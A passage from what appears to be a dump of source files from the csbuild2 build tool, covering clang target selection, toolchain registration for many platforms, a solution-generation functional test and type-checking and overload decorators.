target:\n\t\t\t\targs.extend([\n\t\t\t\t\t\"-target\", target,\n\t\t\t\t])\n\n\t\treturn args\n\n\tdef _getArchTarget(self, project):\n\t\ttargetPrefix = self._clangToolInfo.nativeTargetPrefix\n\t\ttargetSuffix = self._clangToolInfo.nativeTargetSuffix\n\n\t\tif not targetPrefix or not targetSuffix:\n\t\t\treturn None\n\n\t\t# When necessary fill in the architecture name with something clang expects.\n\t\ttargetPrefix = {\n\t\t\t\"x86\": \"i386\",\n\t\t\t\"x64\": \"x86_64\",\n\t\t\t\"arm\": targetPrefix \\\n\t\t\t\tif targetPrefix.startswith(\"armv\") \\\n\t\t\t\telse \"armv6\",\n\t\t\t\"arm64\": targetPrefix \\\n\t\t\t\tif targetPrefix.startswith(\"aarch64\") \\\n\t\t\t\telse \"aarch64\",\n\t\t}.get(project.architectureName, None)\n\t\tif not targetPrefix:\n\t\t\treturn None\n\n\t\treturn \"{}-{}\".format(targetPrefix, targetSuffix)\n\n\t####################################################################################################################\n\t### Methods 
implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tTool.SetupForProject(self, project)\n\n\t\t# Create the clang tool info if the singleton doesn't already exist.\n\t\tif not ClangHostToolInfo.Instance:\n\t\t\tClangHostToolInfo.Instance = ClangHostToolInfo()\n\n\t\tself._clangToolInfo = ClangHostToolInfo.Instance\n" }, { "alpha_fraction": 0.6632652878761292, "alphanum_fraction": 0.6632652878761292, "avg_line_length": 13, "blob_id": "ca7868146931398736301fa3b784f02780256eb7", "content_id": "745cd1808c946023244d28e58401f67347f520f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 98, "license_type": "no_license", "max_line_length": 28, "num_lines": 7, "path": "/functional_tests/cpp_rpath_test/libhello/libhello.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include \"libhello.hpp\"\n\nvoid goodbye_world()\n{\n\tprintf(\" Goodbye, World!\");\n}\n" }, { "alpha_fraction": 0.7844436168670654, "alphanum_fraction": 0.809225857257843, "avg_line_length": 42.35638427734375, "blob_id": "44580df1c4e652c39edcca9e6987e0790f3a888b", "content_id": "fb3dec17dd4a67438f3ab9af057298606d9af701", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8151, "license_type": "no_license", "max_line_length": 145, "num_lines": 188, "path": "/csbuild/tools/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: tools\n\t:synopsis: Set of built-in tools that ship with csbuild\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport platform\n\nfrom .assemblers import AsmCompileChecker\nfrom .cpp_compilers import CppCompileChecker\n\nfrom .assemblers.android_clang_assembler import AndroidClangAssembler\nfrom .assemblers.android_gcc_assembler import AndroidGccAssembler\nfrom .assemblers.clang_assembler import ClangAssembler\nfrom .assemblers.gcc_assembler import GccAssembler\nfrom .assemblers.msvc_assembler import MsvcAssembler\nfrom .assemblers.msvc_uwp_assembler import MsvcUwpAssembler\nfrom .assemblers.ps3_assembler import Ps3Assembler\nfrom .assemblers.ps4_assembler import Ps4Assembler\nfrom .assemblers.ps5_assembler import Ps5Assembler\nfrom .assemblers.psvita_assembler import PsVitaAssembler\nfrom .assemblers.xbox_360_assembler import Xbox360Assembler\n\nfrom .common.sony_tool_base import Ps3SpuConverter\nfrom .common.xbox_360_tool_base import Xbox360ImageXexTool\n\nfrom .cpp_compilers.android_clang_cpp_compiler import AndroidClangCppCompiler\nfrom .cpp_compilers.android_gcc_cpp_compiler import AndroidGccCppCompiler\nfrom .cpp_compilers.clang_cpp_compiler import ClangCppCompiler\nfrom .cpp_compilers.gcc_cpp_compiler import GccCppCompiler\nfrom .cpp_compilers.mac_os_clang_cpp_compiler import MacOsClangCppCompiler\nfrom .cpp_compilers.msvc_cpp_compiler import MsvcCppCompiler\nfrom .cpp_compilers.msvc_uwp_cpp_compiler import MsvcUwpCppCompiler\nfrom .cpp_compilers.ps3_cpp_compiler import Ps3CppCompiler\nfrom .cpp_compilers.ps4_cpp_compiler import Ps4CppCompiler\nfrom .cpp_compilers.ps5_cpp_compiler import Ps5CppCompiler\nfrom .cpp_compilers.psvita_cpp_compiler import PsVitaCppCompiler\nfrom .cpp_compilers.xbox_360_cpp_compiler import Xbox360CppCompiler\n\nfrom .java_archivers.oracle_java_archiver import OracleJavaArchiver\n\nfrom .java_compilers.oracle_java_compiler import OracleJavaCompiler\n\nfrom .linkers.android_clang_linker import AndroidClangLinker\nfrom .linkers.android_gcc_linker import AndroidGccLinker\nfrom .linkers.clang_linker import ClangLinker\nfrom .linkers.gcc_linker import GccLinker\nfrom .linkers.mac_os_clang_linker import MacOsClangLinker\nfrom .linkers.msvc_linker import MsvcLinker\nfrom .linkers.msvc_uwp_linker import MsvcUwpLinker\nfrom .linkers.ps3_linker import Ps3Linker\nfrom .linkers.ps4_linker import Ps4Linker\nfrom .linkers.ps5_linker import Ps5Linker\nfrom .linkers.psvita_linker import PsVitaLinker\nfrom .linkers.xbox_360_linker import Xbox360Linker\n\nfrom .project_generators.visual_studio import (\n\tVsProjectGenerator,\n\tVsSolutionGenerator2010,\n\tVsSolutionGenerator2012,\n\tVsSolutionGenerator2013,\n\tVsSolutionGenerator2015,\n\tVsSolutionGenerator2017,\n\tVsSolutionGenerator2019,\n\tVsSolutionGenerator2022,\n)\n\nfrom ..toolchain import CompileChecker\n\ndef _createCheckers(inputMappings):\n\tcheckers = {}\n\n\tfor checkerObj, extensions in inputMappings.items():\n\t\tfor ext in extensions:\n\t\t\tcheckers[ext] = checkerObj\n\n\treturn checkers\n\ndef InitTools():\n\t\"\"\"\n\tInitialize the built-in csbuild tools\n\t\"\"\"\n\tsystemArchitecture = csbuild.GetSystemArchitecture()\n\n\t# Get either the platform-specific clang tools or the default clang tools.\n\tclangCompiler, clangLinker = {\n\t\t\"Darwin\": (MacOsClangCppCompiler, MacOsClangLinker),\n\t}.get(platform.system(), (ClangCppCompiler, ClangLinker))\n\n\t# Register C/C++ toolchains.\n\tfor name, compiler, linker, assembler in [\n\t\t( \"gcc\", GccCppCompiler, GccLinker, GccAssembler ),\n\t\t( \"clang\", 
clangCompiler, clangLinker, ClangAssembler ),\n\t\t( \"msvc\", MsvcCppCompiler, MsvcLinker, MsvcAssembler ),\n\t\t( \"msvc-uwp\", MsvcUwpCppCompiler, MsvcUwpLinker, MsvcUwpAssembler ),\n\t\t( \"mac-clang\", MacOsClangCppCompiler, MacOsClangLinker, ClangAssembler ),\n\t\t( \"android-gcc\", AndroidGccCppCompiler, AndroidGccLinker, AndroidGccAssembler ),\n\t\t( \"android-clang\", AndroidClangCppCompiler, AndroidClangLinker, AndroidClangAssembler ),\n\t]:\n\t\tcheckers = _createCheckers({\n\t\t\tCppCompileChecker(compiler): compiler.inputFiles,\n\t\t\tAsmCompileChecker(assembler): assembler.inputFiles,\n\t\t})\n\n\t\tcsbuild.RegisterToolchain(name, systemArchitecture, compiler, linker, assembler, checkers=checkers)\n\n\t# Register Java toolchains.\n\tfor name, compiler, archiver in [\n\t\t( \"oracle-java\", OracleJavaCompiler, OracleJavaArchiver ),\n\t]:\n\t\tcheckers = _createCheckers({\n\t\t\tCompileChecker(): compiler.inputFiles,\n\t\t})\n\n\t\tcsbuild.RegisterToolchain(name, systemArchitecture, compiler, archiver, checkers=checkers)\n\n\tps3Checkers = _createCheckers({\n\t\tCppCompileChecker(Ps3CppCompiler): Ps3CppCompiler.inputFiles,\n\t\tAsmCompileChecker(Ps3Assembler): Ps3Assembler.inputFiles,\n\t})\n\n\tps4Checkers = _createCheckers({\n\t\tCppCompileChecker(Ps4CppCompiler): Ps4CppCompiler.inputFiles,\n\t\tAsmCompileChecker(Ps4Assembler): Ps4Assembler.inputFiles,\n\t})\n\n\tps5Checkers = _createCheckers({\n\t\tCppCompileChecker(Ps5CppCompiler): Ps5CppCompiler.inputFiles,\n\t\tAsmCompileChecker(Ps5Assembler): Ps5Assembler.inputFiles,\n\t})\n\n\tpsVitaCheckers = _createCheckers({\n\t\tCppCompileChecker(PsVitaCppCompiler): PsVitaCppCompiler.inputFiles,\n\t\tAsmCompileChecker(PsVitaAssembler): PsVitaAssembler.inputFiles,\n\t})\n\n\t# Register the Sony platform toolchains.\n\tcsbuild.RegisterToolchain(\"ps3\", \"cell\", Ps3CppCompiler, Ps3Linker, Ps3Assembler, Ps3SpuConverter, checkers=ps3Checkers)\n\tcsbuild.RegisterToolchain(\"ps4\", \"x64\", Ps4CppCompiler, Ps4Linker, Ps4Assembler, checkers=ps4Checkers)\n\tcsbuild.RegisterToolchain(\"ps5\", \"x64\", Ps5CppCompiler, Ps5Linker, Ps5Assembler, checkers=ps5Checkers)\n\tcsbuild.RegisterToolchain(\"psvita\", \"arm\", PsVitaCppCompiler, PsVitaLinker, PsVitaAssembler, checkers=psVitaCheckers)\n\n\txbox360Checkers = _createCheckers({\n\t\tCppCompileChecker(Xbox360CppCompiler): Xbox360CppCompiler.inputFiles,\n\t\tAsmCompileChecker(Xbox360Assembler): Xbox360Assembler.inputFiles,\n\t})\n\n\t# Register the Xbox platform toolchains.\n\tcsbuild.RegisterToolchain(\"xbox360\", \"xcpu\", Xbox360CppCompiler, Xbox360Linker, Xbox360Assembler, Xbox360ImageXexTool, checkers=xbox360Checkers)\n\n\t# Register toolchain groups.\n\tcsbuild.RegisterToolchainGroup(\"msvc\", \"msvc\", \"msvc-uwp\")\n\tcsbuild.RegisterToolchainGroup(\"gnu\", \"gcc\", \"clang\")\n\tcsbuild.RegisterToolchainGroup(\"android\", \"android-gcc\", \"android-clang\")\n\tcsbuild.RegisterToolchainGroup(\"sony\", \"ps3\", \"ps4\", \"ps5\", \"psvita\")\n\n\t# Register default project generators.\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2010\", [VsProjectGenerator], VsSolutionGenerator2010)\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2012\", [VsProjectGenerator], VsSolutionGenerator2012)\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2013\", [VsProjectGenerator], VsSolutionGenerator2013)\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2015\", [VsProjectGenerator], VsSolutionGenerator2015)\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2017\", [VsProjectGenerator], 
VsSolutionGenerator2017)\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2019\", [VsProjectGenerator], VsSolutionGenerator2019)\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2022\", [VsProjectGenerator], VsSolutionGenerator2022)\n" }, { "alpha_fraction": 0.737864077091217, "alphanum_fraction": 0.7424328923225403, "avg_line_length": 39.252872467041016, "blob_id": "77f02a1384cfb3d9e181c1a9a691f4b0a84aa8d0", "content_id": "cb8f6c859b800574d89c5f07ba11261073f2fe9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3502, "license_type": "no_license", "max_line_length": 131, "num_lines": 87, "path": "/functional_tests/project_generator_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Basic test of tools to make sure simple tools chain together properly\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport shutil\n\nfrom csbuild._testing.functional_test import FunctionalTest\n\nclass SolutionGenerationTest(FunctionalTest):\n\t\"\"\"Basic tool test\"\"\"\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tFunctionalTest.setUp(self, cleanAtEnd=False)\n\n\tdef tearDown(self):\n\t\tshutil.rmtree(\"./Solutions\")\n\t\tFunctionalTest.tearDown(self)\n\n\t# pylint: disable=invalid-name\n\tdef testSolutionGenerationWorks(self):\n\t\t\"\"\"Basic solution generation test\"\"\"\n\t\tself.assertMakeSucceeds(\"-v\", \"--generate-solution\", \"DummyGenerator\", \"--all-targets\")\n\n\t\ttargets = [\"debug\", \"fastdebug\", \"release\"]\n\n\t\tself.assertFileExists(\"./Solutions/DummyGenerator/csbuild.sln\")\n\t\twith open(\"./Solutions/DummyGenerator/csbuild.sln\") as f:\n\t\t\tcontents = f.read()\n\n\t\tfor target in targets:\n\t\t\texpectedContents = os.path.abspath(\"./Solutions/DummyGenerator/Foo_{}.proj\".format(target))\n\t\t\tself.assertIn(expectedContents, contents)\n\n\t\tfor target in targets:\n\t\t\tprojectFile = \"./Solutions/DummyGenerator/Foo_{}.proj\".format(target)\n\t\t\tself.assertFileExists(projectFile)\n\t\t\twith open(projectFile) as f:\n\t\t\t\tcontents = f.read().splitlines()\n\t\t\tfor i in range(1, 11):\n\t\t\t\tself.assertIn(os.path.abspath(\"./firsts/{}.first\".format(i)), contents)\n\n\t\t\tself.assertFileDoesNotExist(\"./out/Foo.third\")\n\t\t\tfor i in range(1, 11):\n\t\t\t\tself.assertFileDoesNotExist(\"./intermediate/{}.second\".format(i))\n\n\tdef testCleanDoesntRemoveSolutionDir(self):\n\t\t\"\"\"Tests that cleaning doesn't delete solution files\"\"\"\n\t\tself.assertMakeSucceeds(\"-v\", \"--generate-solution\", \"DummyGenerator\")\n\t\tself.assertMakeSucceeds(\"-v\", \"--clean\")\n\t\tself.assertMakeSucceeds(\"-v\", \"--generate-solution\", \"DummyGenerator\", \"--clean\")\n\n\t\tself.assertFileContents(\"./Solutions/DummyGenerator/csbuild.sln\", os.path.abspath(\"./Solutions/DummyGenerator/Foo_release.proj\"))\n\n\t\tself.assertFileExists(\"./Solutions/DummyGenerator/Foo_release.proj\")\n\t\twith open(\"./Solutions/DummyGenerator/Foo_release.proj\") as f:\n\t\t\tcontents = f.read().splitlines()\n\t\tfor i in range(1, 11):\n\t\t\tself.assertIn(os.path.abspath(\"./firsts/{}.first\".format(i)), contents)\n\n\t\tself.assertFileDoesNotExist(\"./out/Foo.third\")\n\t\tfor i in range(1, 11):\n\t\t\tself.assertFileDoesNotExist(\"./intermediate/{}.second\".format(i))\n" }, { "alpha_fraction": 0.6815871000289917, "alphanum_fraction": 0.6871654391288757, "avg_line_length": 36.29697799682617, "blob_id": "eaf79c960d4629bfbaf9aadb07a916afcea87763", "content_id": "5b4178d6003b57d8864977d113470cfe9ad37312", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22229, "license_type": "no_license", "max_line_length": 166, "num_lines": 596, "path": "/csbuild/_utils/decorators.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: decorators\n\t:synopsis: Helpful utility decorators\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport sys\nimport warnings\n\nfrom . import StrType\nfrom .._testing import testcase\nfrom .. import perf_timer\n\nif sys.version_info[0] >= 3:\n\t_typeType = type\n\t_classType = type\nelse:\n\timport types\n\t# pylint: disable=invalid-name\n\t_typeType = types.TypeType\n\t_classType = types.ClassType\n\nNOT_SET = object()\n\ndef TypeChecked(**argtypes):\n\t\"\"\"\n\t**Decorator**\n\tChecks argtypes passed to a function at runtime and throws an exception if an unexpected type is received.\n\n\tExample::\n\n\t\t@TypeChecked(var1=str, var2=int, var3=(int, float, str), _return=type(None))\n\t\tdef Func(var1, var2, var3):\n\t\t\t# Do stuff!\n\n\t:param argtypes: Keyword argument list of argtypes. 
Keywords must match the decorated function's parameters.\n\t\t\t\tThe special keyword *_return* designates the return type.\n\t\t\t\tEach parameter must either specify a type or a tuple of argtypes.\n\t\t\t\tTo explicitly accept all argtypes, pass arg=object.\n\t:return: a type-checked wrapper for the function\n\t:rtype: function\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"TypeChecked decorator\"):\n\t\targtypes = dict(**argtypes)\n\n\t\tdef _wrapOuter(oldFunc):\n\t\t\t\"\"\" Outer decorator wrapper - set up the inner decorator \"\"\"\n\t\t\twith perf_timer.PerfTimer(\"TypeChecked outer wrap\"):\n\t\t\t\t# co_varnames includes both parameters and locals - trim it to just parameters\n\t\t\t\tvarNames = oldFunc.__code__.co_varnames[0:oldFunc.__code__.co_argcount]\n\n\t\t\t\t# Check that all the types provided are actual types and that none of them reference nonexistent parameters\n\t\t\t\tfor name, typ in argtypes.items():\n\t\t\t\t\tif not isinstance(typ, (_typeType, _classType, tuple)):\n\t\t\t\t\t\traise TypeError(\"Parameters to TypeChecked must be type, or tuple of argtypes - not {}\".format(typ))\n\n\t\t\t\t\tif isinstance(typ, tuple):\n\t\t\t\t\t\tfor subtype in typ:\n\t\t\t\t\t\t\tif not isinstance(subtype, (_typeType, _classType)):\n\t\t\t\t\t\t\t\traise TypeError(\"Tuple parameters to TypeChecked must contain only argtypes - not {}\".format(subtype))\n\n\t\t\t\t\tif name == \"_return\":\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif name not in varNames:\n\t\t\t\t\t\traise TypeError(\"Function {} has no parameter named '{}'\".format(oldFunc.__name__, name))\n\n\t\t\t\t# Check that all the function's parameters are represented - for type checking, this is just a warning if they're not\n\t\t\t\tfor name in varNames:\n\t\t\t\t\tif name == \"self\":\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif name not in argtypes:\n\t\t\t\t\t\twarnings.warn(\"Function {}: Parameter '{}' has no type assigned (use 'object' to accept all argtypes)\".format(oldFunc.__name__, name))\n\n\t\t\t\toldFunc.__types__ = argtypes\n\t\t\t\toldFunc.__varNames__ = varNames\n\n\t\t\t\tdef _wrap(*args, **kwargs):\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tInner wrapper - this function actually replaces the decorated function and is called every time\n\t\t\t\t\tthe decorated function is called. 
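For instance, with the illustrative Func from the TypeChecked docstring's Example::\n\n\t\t\t\t\t\tFunc(\"a\", 1, 2.0)  # every argument matches its declared type\n\t\t\t\t\t\tFunc(1, \"b\", 2.0)  # raises TypeError: var1 is int, expected str\n\n\t\t\t\t\t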
It checks all the type arguments before calling the decorated\n\t\t\t\t\tfunction and raises an exception if they don't match.\n\t\t\t\t\t\"\"\"\n\t\t\t\t\twith perf_timer.PerfTimer(\"Type checking\"):\n\t\t\t\t\t\tfor i, name in enumerate(varNames):\n\t\t\t\t\t\t\targtype = argtypes.get(name, NOT_SET)\n\n\t\t\t\t\t\t\tif argtype is NOT_SET:\n\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\tif i < len(args):\n\t\t\t\t\t\t\t\telem = args[i]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\telem = kwargs.get(name, NOT_SET)\n\n\t\t\t\t\t\t\tif elem != NOT_SET:\n\t\t\t\t\t\t\t\tif not isinstance(elem, argtype):\n\t\t\t\t\t\t\t\t\traise TypeError(\"Argument '{}' is type {}, expected {}\".format(name, elem.__class__, argtype))\n\n\t\t\t\t\tresult = oldFunc(*args, **kwargs)\n\n\t\t\t\t\twith perf_timer.PerfTimer(\"Type checking\"):\n\t\t\t\t\t\treturntype = argtypes.get('_return', NOT_SET)\n\t\t\t\t\t\tif returntype != NOT_SET:\n\t\t\t\t\t\t\tif not isinstance(result, returntype):\n\t\t\t\t\t\t\t\traise TypeError(\"Function {} returned invalid return type {}; expected {}\".format(oldFunc.__name__, type(result), returntype))\n\t\t\t\t\t\treturn result\n\t\t\t\treturn _wrap\n\t\treturn _wrapOuter\n\n\ndef Overload(**argtypes):\n\t\"\"\"\n\t**Decorator**\n\tAllows multiple definitions of the same function with different type signatures, and selects the best one\n\tat runtime based on the argtypes passed to it. All functions that are put up for selection MUST be decorated.\n\n\tExample::\n\n\t\t@Overload(var1=str, var2=int)\n\t\tdef Func2(var1, var2):\n\t\t\tprint(\"STRINT\", var1, var2)\n\n\t\t@Overload(var1=int, var2=str)\n\t\tdef Func2(var1, var2):\n\t\t\tprint(\"INTSTR\", var1, var2)\n\n\t\tFunc2(1, \"2\")\n\t\t>> INTSTR 1 2\n\t\tFunc2(\"1\", 2)\n\t\t>> STRINT 1 2\n\n\t:param argtypes: Keyword argument list of argtypes. 
Keywords must match the decorated function's parameters.\n\t\t\t\tThe special keyword *_return* designates the return type, which cannot be used for overloads,\n\t\t\t\tbut will be checked for correctness if specified.\n\t\t\t\tEach parameter may specify a type, a tuple of argtypes, or a value.\n\t\t\t\tTo explicitly accept all argtypes, pass arg=object.\n\t\t\t\tIf a value is passed rather than a type or tuple of argtypes, that value will provide an even more specific\n\t\t\t\toverload (for example, allowing the base case of a recursive function to be defined as an overload\n\t\t\t\tof the function that will be selected when, e.g., param0=0).\n\t:return: A wrapper function that performs overload resolution and calls the correct function\n\t:rtype: function\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"Overload decorator\"):\n\t\targtypes = dict(**argtypes)\n\n\t\tdef _wrapOuter(oldFunc):\n\t\t\t\"\"\" Outer decorator wrapper - set up the inner decorator \"\"\"\n\n\t\t\t# co_varnames includes both parameters and locals - trim it to just parameters\n\n\t\t\tvarNames = oldFunc.__code__.co_varnames[0:oldFunc.__code__.co_argcount]\n\n\t\t\t# Check that all the types provided are actual types and that none of them reference nonexistent parameters\n\t\t\tfor name, typ in argtypes.items():\n\t\t\t\tif isinstance(typ, tuple):\n\t\t\t\t\tfor subtype in typ:\n\t\t\t\t\t\tif not isinstance(subtype, (_typeType, _classType)):\n\t\t\t\t\t\t\traise TypeError(\"Tuple parameters to Overload must contain only argtypes - not {}\".format(subtype))\n\n\t\t\t\tif name == \"_return\":\n\t\t\t\t\tcontinue\n\t\t\t\tif name not in varNames:\n\t\t\t\t\traise TypeError(\"Overloaded function {} has no parameter {}\".format(oldFunc.__name__, name))\n\n\t\t\t# Check that all the function's parameters are represented - for overloads, error if they're not\n\t\t\tfor name in varNames:\n\t\t\t\tif name == \"self\":\n\t\t\t\t\tcontinue\n\t\t\t\tif name not in argtypes:\n\t\t\t\t\traise TypeError(\"Overloaded function {}: Parameter {} has no type assigned (use 'object' to accept all argtypes)\".format(oldFunc.__name__, name))\n\n\t\t\toldFunc.__types__ = argtypes\n\t\t\toldFunc.__varNames__ = varNames\n\n\t\t\tdef _wrap(*args, **kwargs):\n\t\t\t\t\"\"\"\n\t\t\t\tInner wrapper - this function actually replaces the decorated function and is called every time\n\t\t\t\tthe decorated function is called. 
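A minimal sketch of the resolution order, mirroring testValueOverloads below::\n\n\t\t\t\t\t@Overload(arg1=0)\n\t\t\t\t\tdef _simpleOverload(arg1): pass  # value match - highest priority\n\n\t\t\t\t\t@Overload(arg1=int)\n\t\t\t\t\tdef _simpleOverload(arg1): pass  # exact type match - lower priority\n\n\t\t\t\t\t_simpleOverload(0)  # dispatches to the arg1=0 overload\n\t\t\t\t\t_simpleOverload(1)  # dispatches to the arg1=int overload\n\n\t\t\t\t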
It goes through all the decorated functions with this function's\n\t\t\t\tname and picks the one that most closely matches the provided arguments, if any.\n\n\t\t\t\t\"Most closely\" here means that if one function takes int, and one takes 0, 0 more closely matches\n\t\t\t\t0 than int does.\n\t\t\t\t\"\"\"\n\n\t\t\t\t# Set up a list of prioritized functions, giving them a match closeness score\n\t\t\t\tprioritizedFuncs = {}\n\t\t\t\tfor func in Overload.funcs[oldFunc.__name__]:\n\t\t\t\t\tnumArgsGiven = len(args) + len(kwargs)\n\t\t\t\t\tnumArgsTaken = len(func.__varNames__)\n\t\t\t\t\tnumDefaults = len(func.__defaults__) if func.__defaults__ is not None else 0\n\t\t\t\t\t# If the number of arguments provided doesn't match the number of parameters to this overload,\n\t\t\t\t\t# skip it\n\t\t\t\t\tif numArgsGiven > numArgsTaken or numArgsGiven < (numArgsTaken - numDefaults):\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tdisqualified = False\n\t\t\t\t\tpriority = 0\n\t\t\t\t\tfor key in kwargs:\n\t\t\t\t\t\t# If there are any keyword arguments provided that aren't accepted by this overload, skip it\n\t\t\t\t\t\tif key not in func.__varNames__:\n\t\t\t\t\t\t\tdisqualified = True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif disqualified:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t# Quick eliminations out of the way, now the hard part... check all the types\n\t\t\t\t\tfor i, name in enumerate(func.__varNames__):\n\t\t\t\t\t\targtype = func.__types__.get(name)\n\n\t\t\t\t\t\t# pick the correct matching passed-in argument\n\t\t\t\t\t\tif i < len(args):\n\t\t\t\t\t\t\telem = args[i]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\telem = kwargs.get(name, NOT_SET)\n\n\t\t\t\t\t\t# If the specified argument type is object, everything matches at the lowest priority\n\t\t\t\t\t\tif argtype is object:\n\t\t\t\t\t\t\tpriority += 1\n\t\t\t\t\t\telif isinstance(argtype, (_typeType, _classType)):\n\t\t\t\t\t\t\t# If the specified argument is a single type...\n\t\t\t\t\t\t\tif type(elem) is argtype: # pylint: disable=unidiomatic-typecheck\n\t\t\t\t\t\t\t\t# If the passed type is an exact match, this is a higher priority match\n\t\t\t\t\t\t\t\tpriority += 3\n\t\t\t\t\t\t\telif isinstance(elem, argtype):\n\t\t\t\t\t\t\t\t# Otherwise if the passed type's a subclass, middle priority\n\t\t\t\t\t\t\t\tpriority += 2\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t# If an element has been passed in that doesn't match the type, or no element's passed for\n\t\t\t\t\t\t\t\t# an argument with no default value, this overload is disqualified\n\t\t\t\t\t\t\t\tif elem is not NOT_SET or i < (numArgsTaken - numDefaults):\n\t\t\t\t\t\t\t\t\tdisqualified = True\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telif isinstance(argtype, tuple):\n\t\t\t\t\t\t\t# Otherwise this is a list of accepted types\n\t\t\t\t\t\t\tif isinstance(elem, argtype):\n\t\t\t\t\t\t\t\t# If the element matches, middle priority, same as subclass\n\t\t\t\t\t\t\t\tpriority += 2\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t# If an element has been passed in that doesn't match the type, or no element's passed for\n\t\t\t\t\t\t\t\t# an argument with no default value, this overload is disqualified\n\t\t\t\t\t\t\t\tif elem is not NOT_SET or i < (numArgsTaken - numDefaults):\n\t\t\t\t\t\t\t\t\tdisqualified = True\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t# If the specified type is a VALUE and not a 